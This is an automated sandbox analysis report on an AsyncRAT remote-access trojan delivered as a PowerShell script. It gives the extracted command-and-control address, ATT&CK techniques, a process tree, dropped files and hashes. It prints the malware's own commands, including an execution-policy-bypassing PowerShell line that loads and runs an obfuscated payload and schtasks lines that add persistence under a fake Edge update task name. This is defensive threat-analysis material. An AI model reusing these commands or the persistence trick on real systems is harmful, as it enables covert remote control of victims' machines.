asyncrat | ca9af3c4717ffe322f5e2f02fc8745f5744f5e8397a87212246099b4c3e2a53d

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
29/01/2025, 03:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ca9af3c4717ffe322f5e2f02fc8745f5744f5e8397a87212246099b4c3e2a53d.ps1
Size

456KB
MD5

067e3f77fde1c988ac1d1413bafc29ae
SHA1

e2a17181441c1e573a47d7ef8c259bf9797be9e8
SHA256

ca9af3c4717ffe322f5e2f02fc8745f5744f5e8397a87212246099b4c3e2a53d
SHA512

740bd6be6b4eaa189b596abd56eb9fc48b7c7c31b7fb6990ca27c2ee4e2174a9a1e95b4aca2415b4ae59a3b358cbe12b23a44e145fab4fe7b8cdf4a2d669427f
SSDEEP

1536:g9dW/z20+u4dXNR8WrlDnqIuH7FWRGPP3jU86lsWST+HxYfn8qgy5J+LLg7WMJV8:gzaGD

Score

10^/10

asyncrat 00000001 discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4380	powershell.exe
2224	powershell.exe
4184	powershell.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2224 set thread context of 2424	2224	powershell.exe	99
PID 4184 set thread context of 432	4184	powershell.exe	120

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4812	schtasks.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

pid	Process
4380	powershell.exe
4380	powershell.exe
2224	powershell.exe
2224	powershell.exe
3116	msedge.exe
3116	msedge.exe
3368	msedge.exe
3368	msedge.exe
1372	identity_helper.exe
1372	identity_helper.exe
2424	aspnet_compiler.exe
2424	aspnet_compiler.exe
4184	powershell.exe
4184	powershell.exe
4184	powershell.exe
4824	msedge.exe
4824	msedge.exe
4824	msedge.exe
4824	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4380	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe
Token: SeDebugPrivilege	2424	aspnet_compiler.exe
Token: SeDebugPrivilege	4184	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe
3368	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2424	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4380 wrote to memory of 4812	4380	powershell.exe	83
PID 4380 wrote to memory of 4812	4380	powershell.exe	83
PID 4380 wrote to memory of 4428	4380	powershell.exe	104
PID 4380 wrote to memory of 4428	4380	powershell.exe	104
PID 2460 wrote to memory of 2224	2460	WScript.exe	86
PID 2460 wrote to memory of 2224	2460	WScript.exe	86
PID 4380 wrote to memory of 3368	4380	powershell.exe	87
PID 4380 wrote to memory of 3368	4380	powershell.exe	87
PID 3368 wrote to memory of 4640	3368	msedge.exe	88
PID 3368 wrote to memory of 4640	3368	msedge.exe	88
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3968	3368	msedge.exe	90
PID 3368 wrote to memory of 3116	3368	msedge.exe	91
PID 3368 wrote to memory of 3116	3368	msedge.exe	91
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92
PID 3368 wrote to memory of 4656	3368	msedge.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\ca9af3c4717ffe322f5e2f02fc8745f5744f5e8397a87212246099b4c3e2a53d.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /Create /XML \Users\Public\Music\//UKqoc24IV1YQ.xml /TN MicrosoftEdgeUpdateTaskMachineCore6645
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4812
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /run /tn MicrosoftEdgeUpdateTaskMachineCore6645
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.ssa.gov/benefits/retirement/social-security-fairness-act.html
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffc278746f8,0x7ffc27874708,0x7ffc27874718
    3⤵
    PID:4640
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
    3⤵
    PID:3968
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3116
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2712 /prefetch:8
    3⤵
    PID:4656
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:408
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
    3⤵
    PID:1168
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
    3⤵
    PID:1100
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5144 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1372
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1
    3⤵
    PID:4428
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
    3⤵
    PID:1280
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
    3⤵
    PID:3364
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
    3⤵
    PID:2264
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,13272550319135480043,3578764849207257774,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3092 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4824

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\//UKqoc24IV1YQ.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2460
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $ZwzTcBdkMuj8='ReadAllText';$aNTjFb0kci9h='C:\Users\Public\Music\/UKqoc24IV1YQ.Zo5ULgMtQFzD';IEx([IO.File]::$ZwzTcBdkMuj8($aNTjFb0kci9h))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2224
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2424

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1620

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4140

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\//UKqoc24IV1YQ.vbs"
1⤵
- Checks computer location settings
PID:740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass $ZwzTcBdkMuj8='ReadAllText';$aNTjFb0kci9h='C:\Users\Public\Music\/UKqoc24IV1YQ.Zo5ULgMtQFzD';IEx([IO.File]::$ZwzTcBdkMuj8($aNTjFb0kci9h))
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4184
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a0486d6f8406d852dd805b66ff467692

SHA1
77ba1f63142e86b21c951b808f4bc5d8ed89b571

SHA256
c0745fd195f3a51b27e4d35a626378a62935dccebefb94db404166befd68b2be

SHA512
065a62032eb799fade5fe75f390e7ab3c9442d74cb8b520d846662d144433f39b9186b3ef3db3480cd1d1d655d8f0630855ed5d6e85cf157a40c38a19375ed8a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
dc058ebc0f8181946a312f0be99ed79c

SHA1
0c6f376ed8f2d4c275336048c7c9ef9edf18bff0

SHA256
378701e87dcff90aa092702bc299859d6ae8f7e313f773bf594f81df6f40bf6a

SHA512
36e0de64a554762b28045baebf9f71930c59d608f8d05c5faf8906d62eaf83f6d856ef1d1b38110e512fbb1a85d3e2310be11a7f679c6b5b3c62313cc7af52aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\888c563c-ec3f-476b-87ff-cf2f58a088d0.tmp

Filesize
5KB

MD5
d6165ae6bb817da8ed381e654226d172

SHA1
f864dd9cd35209a15e2ba1f5e1cec25f38eee20b

SHA256
e8b4dd8dff52bc500b0bacf8779aca0a77bdf333612e0d27b4603572f419e732

SHA512
88583e1774244ced5a7f98a8d345e644b5f5b4df3df980958c1ba0b303cfb42912d04564ba1d2d232da81edab5475be7a16212f39b99e891dccdefc50d134e22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
312B

MD5
9e402229272f30fc2dc609f7c918d276

SHA1
be27af870b077e30bdc818f6b4f226f3cfcb5682

SHA256
ad054667e9faf0f6fde9954fc0e74e771131d1b76f091f4573326d56985309e6

SHA512
d569946d40e73198cac80037b57bcf3a153c25aa16e09b3e22ba8471706e0b423a6887541a75dd2b199be24e452e862e566d2cf61e035f60ceea80aa949881b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
902B

MD5
f7c65ab8ee3821327adfe5da55e29b35

SHA1
42190c7c12c24e0b0b5507edd06f83b074183467

SHA256
e2e09b7d2c8a62f32612ea0926d965e732036914beab1ddec0288ffc0ec23e47

SHA512
53c31f7d8adbb79d8cd29dc28fc2f4ac1dd9c1f7899a5b5c7bfe7938f6b849e888caf0f68eadc7a7d8f1299892b1bd15f7bdc27f18f1cbe70032eb0de91fb16f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
c797a87f7fcd23bdc471dfd2eacd31a5

SHA1
342fc220566c875d769b8ef94a1658fe12e5c6af

SHA256
ccfe5940de0a4d9cc987a8dadffdf6b095a5a93a805c338dc774517ee3299805

SHA512
5b19917b3d05c7fdafb6943163ebcebcfef65df0039661edc391894cb1a826ede166e957c57d9791161957feff68b8c563601e91c7d0cca77d18b71e2c89fb11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8cf8e5600b17a0b3044b16cb55a6f950

SHA1
d3499c891e3311eca894d855afd87f429c38d2a9

SHA256
b172c646599ded7774b5d0cb504534c24c4177d593f7ebd110f76d805cd97ceb

SHA512
03d105d571d1f5e1155bbd73036b0e9e2b6b2ab6ae9649a41d96fa1744c4a80ab10cbdecba3ed3a261234295a9ad52ddb553454072aa9a9610b960b658f54c05

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6fe7f2ff9f024b0658a4113e39b826fc

SHA1
07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

SHA256
e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

SHA512
64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6b33cff2c64571ee8b1cf14f157f317f

SHA1
ae4426839f5e8c28e8ac6d09b5499d1deda33fd2

SHA256
0381f2b66fae947afa407755ca58105879f85411d9a78b99774059f982ee3619

SHA512
61110504890848c0f2cff028a9f726445d5d63221bade9d3e801527483d29f9730051b10bdd5fa4b454cb40af130989c1aca3a123b5fe7ae665f3ee18c4fa2c2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_egvuwtyr.peh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\UKqoc24IV1YQ.Zo5ULgMtQFzD

Filesize
454KB

MD5
734b815a3b58e39d3f057149914453e4

SHA1
e5c5e33d1885131b966067000218365513ed8f60

SHA256
a2a3798235c330d821f1682d2eb07c1588a7043af66af8e9794e01ef907f63e7

SHA512
de4d692cc3adf81e66a485068044fc0024ee1c910ed9c82dd7d94db7ff986ef68eec7968fb0ba5a2e4fafe7aec73b3a67e1a6da4058b7653b52c1aa6698cea67

Download Submit
C:\Users\Public\Music\UKqoc24IV1YQ.vbs

Filesize
258B

MD5
620fa0406400572ecf7c970d5b3d07c8

SHA1
2906d405ef76b605a6574b4d850f7e8d0f48b45d

SHA256
71f1108823ce5907d1145e6cc05f7ab19afa90e8903940cdcc9c7951fa3a256d

SHA512
e0ecd2e721c713cb79fb29010a45377bca42eb54ae6e3b641f96296f5b54d0086803d6473ed970e48bc55a182a8dbda8ecaf6b6fbf72aab87adba2fec8f6adfa

Download Submit
C:\Users\Public\Music\UKqoc24IV1YQ.xml

Filesize
1KB

MD5
1e9e5a7078dbd492a03f964006d34cf1

SHA1
743c617edc62c21ebdf62879c7fbc635863c8d9b

SHA256
148a4cb2733c2ffc9dd3f36229570eaf2dd925b0b5acb8a5b5f3e5adad218095

SHA512
d7788029ca86f05c4e7bd18bc24c665249c7108d757817c516efa7a22fb0f9e0b02d4ac4c6db95a143fcdb0351aae60ebc318963f39fb899d1f3204c5c300bc9

Download Submit
memory/2224-98-0x00000208C55C0000-0x00000208C55CC000-memory.dmp

Filesize
48KB

Download
memory/2424-99-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/2424-110-0x0000000006190000-0x0000000006734000-memory.dmp

Filesize
5.6MB

Download
memory/2424-111-0x0000000005D80000-0x0000000005E12000-memory.dmp

Filesize
584KB

Download
memory/2424-112-0x0000000005D00000-0x0000000005D0A000-memory.dmp

Filesize
40KB

Download
memory/4380-20-0x000001CCBC670000-0x000001CCBC88C000-memory.dmp

Filesize
2.1MB

Download
memory/4380-0-0x00007FFC2E373000-0x00007FFC2E375000-memory.dmp

Filesize
8KB

Download
memory/4380-22-0x00007FFC2E370000-0x00007FFC2EE31000-memory.dmp

Filesize
10.8MB

Download
memory/4380-15-0x00007FFC2E370000-0x00007FFC2EE31000-memory.dmp

Filesize
10.8MB

Download
memory/4380-11-0x00007FFC2E370000-0x00007FFC2EE31000-memory.dmp

Filesize
10.8MB

Download
memory/4380-10-0x000001CCBC9C0000-0x000001CCBC9E2000-memory.dmp

Filesize
136KB

Download